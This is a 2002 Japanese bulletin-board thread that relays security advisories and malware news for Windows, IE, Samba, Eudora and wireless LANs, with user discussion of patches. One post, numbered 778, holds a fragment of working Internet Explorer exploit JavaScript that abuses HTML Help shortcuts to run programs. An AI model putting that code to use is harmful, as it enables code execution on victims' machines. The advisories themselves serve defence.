概要: ----- Windows 95/98/Me/NT/2000 用の HTTP サーバである AN HTTPD のバージョン 1.41d には、クロスサイトスクリプティングを発生させてしまう可能性のあ る問題が含まれています。 問題: ----- AN HTTPD は、クライアントからの HTTP リクエスト中の URI に ":" が含 まれている場合にエラーページを表示します。このエラーページ中には、リ クエスト URI が適切にサニタイズされずに挿入されているため、クロスサ イトスクリプティングの問題を発生させてしまう可能性があります。 問題を確認したバージョン: ------------------------- AN HTTPD 1.41d 問題を確認した OS: ------------------ Windows 2000 Server + SP3 (続く)
インターネットエクスプロアーってなんだろう・・・
>716 そっとしとけ
セキュリティとは無関係だということぐらいは読みとれよ。
■Microsoft IISに新たな4つのセキュリティホール、パッチが公開(MS02-062)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-062ov.asp MS02-062 に関する情報
「MS02-062: Internet Information Services 用の累積的な修正プログラム
(Q327696) 」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、Internet Information Server 4.0 (IIS4.0) または
Internet Information Services 5.0/5.1 (IIS5.0/5.1) に影響を及ぼす、
セキュリティ上の問題を排除する累積的な修正プログラムです。
以前に公開された MS02-028 : HTR のチャンクされたエンコードの
ヒープ オーバーランにより Web サーバーのセキュリティが侵害される
(Q321599)」で修正された問題に加えて、新たに発見された 4 つの問題を
排除します。
(続く)
■Windows2000のルートフォルダのデフォルト設定が不適切、
設定変更呼びかけ(MS02-064)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-064ov.asp MS02-064 に関する情報
「MS02-064: Windows 2000 の既定のアクセス権により、
トロイの木馬プログラムが実行される (Q327522)」に関する要約情報です。
セキュリティ情報の概要と回避策の情報をご案内いたします。
概要
====
この問題は、下記対象となる製品の既定のアクセス権により、悪意のある
ユーザーによりトロイの木馬などの不正なプログラムが実行される可能性が
あります。
対象となる製品
==============
・ Microsoft Windows 2000
>>722 修正プログラム
==============
この問題に対処する修正プログラムの提供はございません。 この問題は、
管理者により適切な設定を行うことで対処されます。 システムドライブの
ルートディレクトリのアクセス権を以下のように設定することで、
ベースラインセキュリティを確保することができます。
Administrators:
フル コントロール (このフォルダ、サブフォルダおよびファイル)
Creators Owners:
フル コントロール (サブフォルダとファイルのみ)
System:
フル コントロール (このフォルダ、サブフォルダおよびファイル)
Everyone:
読み取りと実行 (このフォルダのみ)
■Windows XPのPPTP(VPN)にDoS攻撃可能な脆弱性(MS02-063) MS02-063 は現在英語版パッチのみリリース。以下英語版より引用。 Microsoft Security Bulletin MS02-063 Unchecked Buffer in PPTP Implementation Could Enable Denial of Service Attacks (Q329834) Originally posted: October 30, 2002 Summary Who should read this bulletin: Customers using MicrosoftR WindowsR 2000 or Windows XP. Maximum Severity Rating: Critical. Recommendation: Administrators offering PPTP services should install the patch immediately; users who utilize remote access using PPTP should consider installing the patch.
>>725-726 日本語ありました。ちなみに【高】レベル。Win2kもだめ。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-063.asp より引用。
PPTP サービスの未チェックのバッファにより、サービス拒否の攻撃を受ける
(Q329834) (MS02-063)
登録日 : 2002/10/31
更新日 : 2002/10/31
概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows 2000 または
Windows XP を使用しているお客様
脆弱性の影響 : サービス拒否
最大深刻度 : 高
推奨する対応策 : PPTP サービスを提供している管理者は、直ちに修正プログラムを
インストールしてください。PPTP を使用してリモート アクセスを利用しているユーザー
は修正プログラムのインストールを検討してください。
影響を受けるソフトウェア :
Microsoft Windows 2000
Microsoft Windows XP
730 :
___ :02/11/03 13:28 ID:???
>>724 けど、W2Kって普通にインストールすると、C:ドライブは Everyoneフルコントロールで、
下手にアクセス権設定すると、プリンター動かなくなったり、アプリを実行できなく
なったり、ろくな事が無い。って言うのが NT3.51の頃からあったと思う。
実際、今確認したら C:ドライブは Everyoneフルコントロールでした、家のパソコン。
まあいつも Administrator権限でログインしてるから、問題起きないとは思うけど
ちょっと実行するの怖いです・・
プリンター使えなくなるぐらいなら良いけど、下手に間違えたら、起動しなくなりそう・・
そういえばEveryoneを削除したらSpeedDiskが実行できなくなったな。
>>730 うちのマシン(主に奥様が使用)を変えてみました。
いくつか問題出て直したけど、その後は概ね大丈夫みたい。
Everyoneの制限を上げたら、PCの起動に 異様に時間が掛かるようになった。 戻したら元に戻った。 だめぽ…。
>>733 うちのは、、、特にそういう気はしないみたいだけど。
いずれにせよ your own risk にて。
システムドライブのルートディレクトリってC:\のこと? それとも%systemroot%のこと?
737 :
273 :02/11/06 03:46 ID:ErgCklGx
738 :
名無しさん@お腹いっぱい。 :02/11/06 08:44 ID:+ai03aZ7
質問したいことが...fusianasanって名前のところに書き込むとどうなるの?
739 :
navgw.tenri-u.ac.jp :02/11/06 09:46 ID:Qzax/P+Z
npa.go.jpとかだったらもっとイヤだが。
保守
■Mozilla 1.0に6つのセキュリティホール、うち1つはMozilla 1.0.1/1.1にも影響
オープンソース閲覧ソフトウェア『Mozilla』の初期バージョンに6つのセキュリティ
ホールがあり、同ソフトウェアを使っているパソコンは攻撃に弱くなっている
可能性がある。
問題となっているのは、AOL-Time Warner's (NYSE:AOL) の Netscape 部門が
支援する Mozilla プロジェクトから出されたプレバージョン 1.0 だ。
これらバグは、今週 BugTraq のセキュリティリストに掲載されていもので、その
ほとんどは Mozilla の最新バージョンでは既に修正されている。しかし、少なくとも
そのうちの1つは、今もバージョン 1.0.1 と 1.1 に影響を与えている。(Mozilla の
最新リリースのダウンロードはここから)。
(以上、2002年11月8日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20021107/11.html
745 :
:02/11/08 11:34 ID:???
746 :
名無しさん@お腹いっぱい。 :02/11/08 11:42 ID:vwgKVcm/
>>739 さん、で、晒されるとなんか不都合あるんですか?
>>747 おれは「静か?何ねむたいこと抜かしてんのじゃ!
男がいたらうるさいみたいに言うてるけど
女のほうがよっぽど騒々しいやんけボゲェ!」
なので、こんな奴は隔離していいよ。
■破壊的なウィルス「Roron」に注意、ファイル共有ソフトなどを経由して感染
ロシアのKasperskyLabsとフィンランドのF-Secureは6日、「Roron」という新たな
コンピューターウィルスへの注意を喚起し始めた。きわめて破壊的な特徴を持ったウ
ィルスでブルガリアで作成されたとみられている。
Roronはメールの添付ファイル、LAN、ファイル共有サービス「KaZaA」の三つの経
路を通して感染してゆく。いずれの場合もユーザーがファイルを自発的に実行しない
限り感染することはないが、メールの添付ファイルも、KaZaAで共有されるファイル
名もそれぞれ思わせぶりなファイル名がついてるため、何気なく実行してしまうこと
がないよう注意する必要がある。
コンピューターが感染するとinboxフォルダにあるすべてのアドレスに対して自分
自身を添付して外部にメールを送信するほか、ネットワーク共有を探して共有できる
コンピューターに自分自身をコピーする。また、KaZaAのファイル共有フォルダを発
見するとそこに自分自身のコピーを作り、他のKaZaAユーザーがRoronウィルスをダウ
ンロードするように仕向ける。
(以上、2002年11月7日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/1107/roron.htm
■セキュリティー対策ソフトのウィンドウを無効化し削除を行なう「Oror」ウイルス
シマンテック株式会社は、受信トレイなどで発見したメールアドレス全てに自分
自身を送信するウィルス「W32.HLLW.Oror.B@mm(以下、Oror)」を感染力“高”と
して警告した。被害状況は数十台ながらも、ダメージは“中”となっている。
Ororは、大量メール送信ワーム型のウィルスで、感染後に受信トレイやWindowsの
アドレス帳にあるメールアドレス全てに自分自身を送信する点が特徴だ。メール
経由での感染以外に、mIRCやネットワーク共有、マッピングドライブを介しても感染を
広げるため感染力が高い。
(中略)
実際にOrorに感染すると、まず偽のエラーメッセージを表示し、Windowsフォルダー
にランダムなファイル名を使って自分自身をコピーする。また、レジストリーを改変
してWindows起動時に毎回自分自身が起動するように変更する。続いて、「mcafee」
や「shield」など、セキュリティー関連ソフトと思われる文字列を含むウィンドウを全て
閉じる。さらに、「norton and virus」や「black and ice」などの文字列を含むフォルダー
やサブフォルダーを削除する。これらのセキュリティー関連ソフト対策を行なった上
で、取得したメールアドレス全てに自分自身を送信したり、ネットワーク共有や
マッピングドライブに自分自身をコピーするなど、巧妙な作りとなっている。
(以上、2002年11月8日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/1108/oror.htm
■URLをクリックさせて感染させるウイルス「FRIENDGRT」
株式会社トレンドマイクロは、メール本文中に記載されているURLをクリック
すると、ワームプログラムがインストールされるウィルス「WORM_FRIENDGRT.B
(以下、FRIENDGRT)」を警告した。日本での感染数はまだ少ないものの、米国
では3日間で600件以上の感染が発生している。
FRIENDGRTは、10月24日頃登場したウィルス「WORM_FRIENDGRT.A」の亜種と
なる。このウィルスは、送信されてきたメールの本文中に記載されているURLを
受信者自らクリックすることによって感染する形態となっている。このような形態を
とっているため、通常のウィルスメールと異なり、メールに添付ファイルが存在
しないので注意が必要だ。感染すると、Microsoft Outlookのリストにある全ての
宛先に、ウィルスをダウンロードさせるURLが記載されたメールを送信する。
(以上、2002年11月12日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/1111/friend.htm むやみやたらに何でもクリックするのは危険ということで。
>>752 エロサイトのようにアクチブXでインストールさせようとするんですかいね。
しかしそれだとサイトはとんでもないアクセス過多になって速攻でつぶれてそう・・・。
Win2k+IE5.01+パッチ全てでやってみましたけど この環境では再現しないみたいですね。
保守
保守
760 :
Seisei_Yamaguchi :02/11/19 22:43 ID:6Rq/yP2x
片山さんのチマチマ発言が皿されてるスレわどこですか?
>>761 おお、今書こうと思ってたら、、、。乙です。
■EudoraのScript実行に脆弱性、情報漏洩の可能性
http://www.idefense.com/advisory/11.19.02b.txt (英語)
上記より一部引用:
>Remote exploitation of a weakness in Eudora could allow for the potential
>retrieval of sensitive information from a targeted Eudora user's computer.
>...
>VIII. DISCLOSURE TIMELINE
>(中略)
>11/19/2002 Still no reply for vendor clarification of response
>11/19/2002Public disclosure
ということで、現時点で対応はされていない模様。
たぶん日本語版のEudoraもやばいと思われ。
766 :
名無しさん@お腹いっぱい。 :02/11/20 15:17 ID:hcRo8hbF
64.231.64.7X HSE-Toronto-ppp303305.sympatico.ca 人のパソコンに勝手にアクセス掛けてくる ワンノブザ ばか
■IEに新たな6つの脆弱性、パッチの適用を(MS02-066)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp MS02-066 に関する情報
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-047 : Internet Explorer 用の累積的な
修正プログラム (Q323759) で修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・ Internet Explorer 6、6 Service Pack 1
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
(続く)
>>769 続き
詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。
(重要) 不正な PNG 形式のイメージ ファイルの処理に含まれる脆弱性を悪用し
バッファのオーバーラン攻撃が行われる可能性がある問題です。
(警告) URL エンコードの文字処理に含まれる脆弱性を悪用し、個人情報が
漏えいする可能性がある問題です。
(重要) フレームおよびフレーム タグを処理に含まれるクロスサイト
スクリプティング (CSS) の脆弱性を悪用し、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(注意) オブジェクト タグの処理に含まれる脆弱性を悪用し、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(重要) Web ページで特定のプログラミング技術を使用している場合、
クロスドメインの脆弱性を悪用し、ユーザーのローカルファイルを
読み取られる可能性がある問題です。さらに、攻撃者は
ローカル システムにすでに存在している実行可能ファイルを呼び出す
可能性があります。
(重要) 上記のもう一つの問題によりクロスドメインの脆弱性を悪用し、
ユーザーのローカルファイルを読み取られる、または、
ローカル システムにすでに存在している実行可能ファイルを
呼び出す可能性があります。
概要
====
この問題は、Microsoft Data Access Components (MDAC) に含まれる
Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる
未チェックのバッファにより、不正なプログラムが実行される可能性が
あります。
対象となる製品
==============
・Microsoft Data Access Components (MDAC) 2.1
・Microsoft Data Access Components (MDAC) 2.5
・Microsoft Data Access Components (MDAC) 2.6
・Internet Explorer 5.01
・Internet Explorer 5.5
・Internet Explorer 6
以下の OS を利用しているユーザーは修正プログラムをインストールする
必要があります。
・Windows 98
・Windows 98 Second Edition
・Windows Millennium Edition
・Windows NT4.0
・Windows 2000
MDAC 2.7 および Windows XP はこの問題の影響を受けません。
MDAC のバージョンの確認方法については次の技術情報をご覧ください。
JP301202 [HOW TO] MDAC のバージョンを確認する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
修正プログラム
==============
・Microsoft Data Access Components (MDAC)
http://download.microsoft.com/download/dasdk/Patch/Q329414/W98NT42KMe/EN-US/q329414_mdacall_x86.exe 詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザー
による以下の攻撃を防ぐことができます。
(緊急) RDS の文字列の処理に存在する脆弱性を悪用し、バッファの
オーバーラン攻撃が行われる問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を受ける
ことがあります。この攻撃は、受動的攻撃という悪意のあるユーザーから
送られた HTML 形式の電子メールからも攻撃を受ける可能性があります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから行われる
ことがあります。
この MDAC の脆弱性を悪用されることにより、Internet Explorer や
Internet Information Services (IIS) に、以下のような実害を受ける事が
考えられます。
Internet Explorer に想定する実害
・意図しないアプリケーションが動作させられる可能性があります。
その結果、ワームの感染、データの削除、トロイの木馬の実行などが
考えられます。
Internet Informaiton Services (IIS) に想定する被害(略)
>>767 1.4.1_01に限っては結構前から出てたよ。
MDAC 2.7も相当前から出てた。
777 :
:02/11/22 00:36 ID:???
778 :
777 :02/11/22 00:38 ID:???
if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:')"); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> --------------------------- CUT HERE ---------------------------
>>775 リンクが無いしダウンロードのリストにも無いけど、1.41_03というのが
対策版になる予定の物なんだろうか。
■samba-2.2.7リリース、セキュリティホールの修正を含む
厳密にはWindowsではないですが、一応。
http://samba.org/ ftp://ftp.samba.org/pub/samba/samba-2.2.7.tar.gz 添付ドキュメントより抜粋:
IMPORTANT: Security bugfix for Samba
------------------------------------
Summary
-------
A security hole has been discovered in versions 2.2.2 through 2.2.6
of Samba that could potentially allow an attacker to gain root access
on the target machine. The word "potentially" is used because there
is no known exploit of this bug, and the Samba Team has not been able to
craft one ourselves. However, the seriousness of the problem warrants
this immediate 2.2.7 release.
In addition to addressing this security issue, Samba 2.2.7 also includes
thirteen unrelated improvements. These improvements result from our
process of continuous quality assurance and code review, and are part of
the Samba team's committment to excellence.
>>780 情報元の 2. Affected Releases
ここに書いてあるバージョンまでが
影響を受けるらしい。
今ダウンロードできるの入れとけばいいんじゃない?
783 :
名無しさん@お腹いっぱい。 :02/11/22 12:56 ID:mUJc76WV
784 :
フセフオ、キ、オ、ェハ「、、、テ、ム、、。」 :02/11/22 15:58 ID:mUJc76WV
windowsupdateかけたらHDDがいきなりブー言った。すげぇ驚いた。 今はなんとも無いようだが、電源落とすのが怖い。
787 :
名無しさん@お腹いっぱい。 :02/11/24 14:43 ID:dyrkKapX
セキュリティとは直接関係ないかもしれませんが、Win98SEをクリーンインストールし WindowsUpdateしようとしても「更新するものないよ」という状態になってます。 お手上げ。
>>787 面倒だけど、自分で拾って取っておくのが一番確実
790 :
名無しさん@お腹いっぱい。 :02/11/24 15:48 ID:Jjtx7RSN
IEのSP1いれたぞい
795 :
名無しさん@お腹いっぱい。 :02/11/26 16:02 ID:WX2TiNlE
穴だらけIE なんとかしてちょ
ここまで読んだ
797 :
名無しさん@お腹いっぱい。 :02/11/27 10:26 ID:yqr5TjD3
>>783 MDACのパッチを当てても、当たったかどうかの確認方法がかかれていません・・。
本当に、適用されているのかなぁ。
どなたか、ごぞんじないですか?
今日、久しぶりにMSからメールが来たが 相変わらずHTML形式じゃん・・・ やる気あるのか?
/////////////////////////////////////////////////////////////////////// SNS Spiffy Reviews No.4 個人情報漏洩の可能性のある脆弱性 百貨店等で使用されている POS 機器の例 Problem first discovered: Tue, 17 Sep 2002 Problem Published: Wed, 27 Nov 2002 /////////////////////////////////////////////////////////////////////// 問題の概要: =========== 百貨店等で使用されている無線 LAN 対応 POS 機器の設定によって個人情報 が漏洩する危険性があります。 我々の調査したいくつかの百貨店等の中で、WEP の設定がされていない POS 機器があり、クレジットカード情報や購入商品情報などが漏洩する可能性が あります。 問題の詳細: =========== 1.アクセスポイントの大量導入 ある百貨店内で大量のアクセスポイントを検知し、検知された基地局の SSID と導入されているアクセスポイント機器に貼り付けられている名称 が一致していることを確認しました。 2.WEP による暗号化が行われていない 調査した百貨店に導入されている無線 LAN 環境では WEP キーが設定され ていませんでした。従って、無線 LAN 対応 POS 機器の通信は WEP による 暗号化が行われていないと推測されます。クレジットカード番号や購入商 品情報などの個人情報が平文で通信されている可能性があります。 ただし、通信の傍受は行っていませんので、個人情報漏洩の事実は確認し ていません。
>>799 続き
3.使用場所を推測可能な SSID の使用
調査した百貨店に導入されているアクセスポイントには、使用場所を推測
可能な SSID を使用しているものがありました。
どの店舗のデータであるか容易に特定されてしまう可能性があり、また、
データを取得したいという動機にもなると思われます。
対策:
=====
無線 LAN 対応 POS 機器において WEP による暗号化を行うことが対策です。
しかし、調査した百貨店で使用されていた無線 LAN 対応 POS メーカに、
WEP機能設定が可能か問い合わせを行いましたが、1 ヶ月以上経過して現在
も回答が得られませんでした。
問題の大きさから考えて、該当する百貨店等の名称や、無線 LAN 対応 POS
メーカの名称は公開しないこととします。
発見者:
=======
酒井美貴 (LAC)
>>799-801 は Windows に限った話ではありませんが、
社会的影響が大きいと判断し、あえて掲載することとしました。
やっぱり 『脱MS宣言』 しかない。
じゃあ超漢字買ってくるわ。
>810 msxml3.dllのバージョンがSP3なら問題無い訳ね。
ここまで読んで、対処済み
813 :
名無しさん@お腹いっぱい。 :02/12/01 15:54 ID:gjpU9Ftx
>>797 \Program Files\Common Files\System\ado\MDACReadme.htmとか。
814 :
名無しさん@お腹いっぱい。 :02/12/01 17:23 ID:o/IFH4Ht
最近HPみていたら感染した。 WORM_DATOM.A これってHP見ただけで感染するのか?
http://www.kawabata.com/Forums/ShowPost.aspx?PostID=102 ファイル名: mdacver.wsf
--------------------------------------------------------------------------------
<job>
<script language="vbscript">
Dim FullInstallVer, Version
Dim Path
'--- レジストリパス
Path = "HKLM\Software\Microsoft\DataAccess\"
FullInstallVer = RegRead(Path, "FullInstallVer")
Version = RegRead(Path, "Version")
Wscript.Echo _
"MDAC バージョン情報" & vbCrLf _
& " FullInstallVer: " & FullInstallVer & vbCrLf _
& " Version: " & Version & vbCrLf _
& " 参考: " _
816 :
名無しさん@お腹いっぱい。 :02/12/01 18:09 ID:OL2R21+z
−二乗分の印刷が行われる− 本現象は、Internet Explorer と Excel の仕様に基づいた動作となります。 物凄い仕様だな。マイクロソフトには、「仕様が誤りでした」という考えはないのかな。
818 :
名無しさん@お腹いっぱい。 :02/12/01 18:25 ID:n04pXdud
二乗分の印刷が仕様と言い張るなら、確認ダイアログくらい出して欲しいもんだが…。 出ないのも仕様な罠。
保守
■Windows XPの無線LANに登録情報漏洩の危険性、MSは「仕様」と判断 概要: ----- Windows XP の無線 LAN 機能には、登録してあるアクセスポイントに関する情報 を外部に漏洩する可能性があります。 また、本来の対象アクセスポイントの電波が届かない場合であっても登録されて いる WEP で暗号化したパケットを送出する可能性があります。 これらの問題により、Windows XP に登録されているアクセスポイントの SSID の リスト、及び登録されている WEP で暗号化されたパケットを入手され、解読され る危険性があります。
>>821 続き
問題:
-----
Windows XP で無線 LAN を使用する PC は、利用可能なアクセスポイントの検索
を自動的に行います。もし見つからなかった場合、どれか一つのアクセスポイン
トに接続されるまで、既に設定が登録されているアクセスポイントに対する利用
可否の問い合わせを継続して行います。
ここで、既に XP 内に設定が存在するアクセスポイントと同じ SSID を持つ、別
のアクセスポイントを設置した場合、Windows XP は同一のアクセスポイントと認
識し、この設定済みの WEP でパケットを暗号化して通信を開始しようとします。
この機能により、利用可否の問い合わせのパケットから、無線 LAN 用のパケット
モニタリングツールを使用して登録されている SSID に関する情報を入手するこ
とが可能です。また、その SSID と同一のアクセスポイントを設置することで、
Windows XP の PC に登録されている任意のアクセスポイントの WEP で暗号化さ
れたパケットを入手することが可能となります。
>>822 続き
利用可否の問い合わせと、利用できるネットワークへの自動接続は、無線 LAN の
ネットワークを無効に設定しない限り常に自動で行われるため、電源の入ってい
る Windows XP のマシンは、利用できるアクセスポイントが無い状態で常に登録
されているアクセスポイントの SSID の情報を周囲に漏らしていることになりま
す。
また、WEP にはいくつかの既知の脆弱性が指摘されています。40 bit 長の鍵によ
る暗号化では、ブルートフォース攻撃によって比較的短時間で解読可能であり、
これが 104 bit 長の場合であっても 2 週間程度で解読可能であるという報告も
あります。
このため、WEP で暗号化されたパケットを本来のアクセスポイントがないところ
で送出することは、セキュリティ上好ましい機能ではありません。
図を伴った説明は以下の URL で参照できます。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/60.html
>>823 続き
対策:
-----
以下の方法でこの問題を回避することが可能です。
・Windows XP の無線 LAN 機能を無効に設定し、上記問題のないサードパーティ
製のドライバを利用する。
発見者:
-------
三輪信雄
[email protected] 報告の経緯:
-----------
この問題は Security Response Team of Microsoft Asia Limited に 2002 年
8 月 30 日に報告し、本アドバイザリで報告されている「仕様」の変更の可能性
について議論を続けてきましたが、仕様の変更は行われないことが確実となり、
Security Response Team of Microsoft Asia Limited の同意を得て本アドバイザ
リを発行いたします。
謝辞:
-----
Security Response Team of Microsoft Asia Limited
そもそも無線LAN自体にセキュリティーなんぞ無いから 対策したところで意味無いような気がしないような
>>826 御意ですが、
ようは、仕様の不備によってリスクが増えますよ、っていうことでしょう。
詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。
(警告) 特殊な電子メール ヘッダー情報の処理の脆弱性を悪用し、Outlook が
異常終了される問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を受けることが
あります。この攻撃は、受動的攻撃という悪意のあるユーザーから送られた
電子メールから攻撃を受ける可能性があります。この攻撃は、ハッカーまたは
クラッカーと呼ばれる悪意のあるユーザーや、ワームといった自動的な攻撃を
目的とした悪意のあるプログラムから行われることがあります。
この脆弱性を悪用されることにより、以下のような実害を受ける事が考えられ
ます。
・ 原因となる電子メールがサーバーまたは個人用フォルダ上に残っている場合
に、そのメールを参照することで Outlook が異常終了されられるため、
正常なメール操作を行えなくなる可能性があります。
日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS02-067: E-mail Header Processing Flaw Could Cause Outlook 2002
to Fail (331866)
http://www.microsoft.com/technet/security/bulletin/MS02-067.asp
833 :
むむむ ◆MUMUMUkopk :02/12/06 14:50 ID:4Nz69wNv
■トレンドマイクロ「ウイルスバスター」シリーズにバッファオーバーフローの脆弱性
コンピューターウイルス対策ソフトのトレンドマイクロは、同社のソフト「ウイルス
バスター」に安全上の欠陥(セキュリティーホール)があることを明らかにした。
人為的にソフトを強制終了できるもので、悪用すればウイルス対策を無効に
できるという。問題を修正するためのソフト(パッチ)を、6日中に配布する。
問題点が見つかったのは、同社が先月発売した消費者向けの対策ソフト
「ウイルスバスター2003 リアルセキュリティ」と、昨年発売した「ウイルス
バスター2002」。
(中略)
見つかったのは、ソフトの処理能力を上回るデータを送りつけてソフトを
強制終了させる「バッファオーバーフロー」といわれるセキュリティーホール。
伊藤忠商事の子会社でセキュリティー情報サービス会社のアイ・ディフェンス・
ジャパン(東京・港、横山竜太郎社長)が指摘していた。
(以上、2002年12月6日のNIKKEI NETより一部引用―全文は引用元を参照)
引用元:
http://it.nikkei.co.jp/it/top/topCh.cfm?id=20021205e3mi01g505
>>828 で報告のありましたMS02-068ですが、新たな問題が判明したため、
深刻度が重要から緊急に格上げされております。該当ユーザは早急にパッチを
当てられることをおすすめします。
なお、新たな問題に対してもすでに公開したパッチは対応できることがわかっているため、
「2002/12/05 に公開した修正プログラムに変更はありません。」
Internet Explorer 用の累積的な修正プログラム (324929) (MS02-068)
登録日 : 2002/12/5
更新日 : 2002/12/7
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp ================================================================
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報の深刻度を
「緊急」に変更し、脆弱性の影響に関する情報を更新しました。
================================================================
概要 :このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Explorer を使用しているお客様
脆弱性の影響 : 攻撃者がユーザーのシステムでコマンドを実行する可能性が
あります。
最大深刻度 : 緊急
推奨する対応策 : お客様はこの累積的な修正プログラムをできる限り早期に
インストールして下さい。
影響を受けるソフトウェア :
・Microsoft Internet Explorer 5.5
・Microsoft Internet Explorer 6
問題 : 技術的な説明 : この Internet Explorer 5.5 Service Pack 2 、6 および 6 Service Pack 1 用の累積的な修正プログラムのセキュリティ情報を更新しました。 2002/12/05 に公開した修正プログラムに変更はありません。 Internet Explorer 5.5 および 6 用に以前リリースされた修正プログラムの すべての修正を含みます。さらに、追加で Internet Explorer のクロス ドメイン セキュリティ モデルに存在する問題を排除します。 この問題は、 Web ページで特定のオブジェクト キャッシュ技術が使用されている場合に Internet Explorer が行うセキュリティ チェックが不完全であるために 起こります。これにより、攻撃者がユーザーのシステムでコマンドを 実行できる可能性があります。 この脆弱性により、攻撃者がユーザーのローカル システムに既に存在している 実行可能ファイルを呼び出す可能性があります。また、攻撃者は悪質な 実行可能ファイルをユーザーのシステムに読み込む、または実行可能 ファイルにパラメータを渡す可能性もあります。しかし、マイクロソフト サポート技術情報 JP810687 で説明されているレジストリ キーの設定は HTML ヘルプのショートカットを無効にします。これにより、悪質な実行可能 ファイルをユーザーのシステムに読み込む、または実行可能ファイルに パラメータを渡すことができなくなるため、この脆弱性の影響が著しく 削減されます。
攻撃者はキャッシュされたプログラミング技術を使用する Web ページを 作成することによりこの脆弱性を悪用し、その Web ページを Web サイトに ホストするか、または電子メールを介しユーザーに送る可能性があります。 Web ベースの攻撃の場合、ユーザーがその Web サイトを訪問すると、Web ページが自動的に開かれます。HTML 形式の電子メール ベースの攻撃の場合、 受信者がその電子メールを開くか、またはプレビュー ウィンドウを使用して 表示すると、Web ページが開かれます。 2002 年 12 月 4 日 (米国日付)、マイクロソフトはこのセキュリティ情報の 最初のバージョンをリリースしました。その後、マイクロソフトは、この セキュリティ情報で解決される脆弱性の影響は、ユーザーのマシンで任意の コードが実行されるとの報告を受けました。マイクロソフトはその報告を 調査し、この脆弱性の悪用によるコードの実行が例証されました。 マイクロソフトはお客様にこの脆弱性の潜在的な影響の新しい評価と、 その更新された深刻度をお知らせするために、この更新された セキュリティ情報をリリースしました。 このセキュリティ情報でリリースされた最初の修正プログラムは、 この脆弱性が悪用されることを防ぎました。また、現在でも効果的です。 また、ユーザーが悪質な Web サイトを訪問、または悪質な HTML 形式の 電子メール メッセージを開く場合、悪意のある集団がユーザーのマシンで コードを実行する可能性のある、このセキュリティ情報以前に解決された すべての脆弱性を排除します。マイクロソフトはすべてのお客様にこの 累積的な修正プログラムのインストールを強く推奨します。
問題を緩和する要素 : ・Internet Explorer 5.01 はこの脆弱性の影響を受けません。 ・Web ベースの攻撃のシナリオでは、攻撃者は強制的にユーザーを Web サイトに訪問させることはできません。その代わり、典型的な方法として、 攻撃者はユーザーに攻撃者の Web サイトへ接続するリンクをクリック させることにより、ユーザーをその Web サイトに誘導することが必要と なります。 ・HTML 形式の電子メール ベースの攻撃のシナリオは既定の構成の Outlook Express 6 および Outlook 2002 により、ブロックされます。また、 Outlook 電子メール セキュリティ アップデートをインストールした Outlook 98 および 2000 により、ブロックされます。 ・マイクロソフト サポート技術情報 JP810687 で説明されているステップに 従い、HTML ヘルプのショートカットを制限している場合、次の問題を緩和する 要素が当てはまります。 ・この脆弱性により、攻撃者はユーザーのローカル システムのファイルを 読み取る可能性がありますが、ファイルの追加、削除、変更はできません。 ・システムのファイルを呼び出すには、攻撃者はファイルの名前と保存先を 知っていることが必要条件となります。攻撃者により実行可能ファイルが 呼び出されても、そのファイルにパラメータが渡されることはありません。 ・この脆弱性により、攻撃者が選択したプログラムが別のユーザーの システムに配置されることはありません。
深刻度 :
Internet Explorer 5.01なし
Internet Explorer 5.5緊急
Internet Explorer 6.0緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
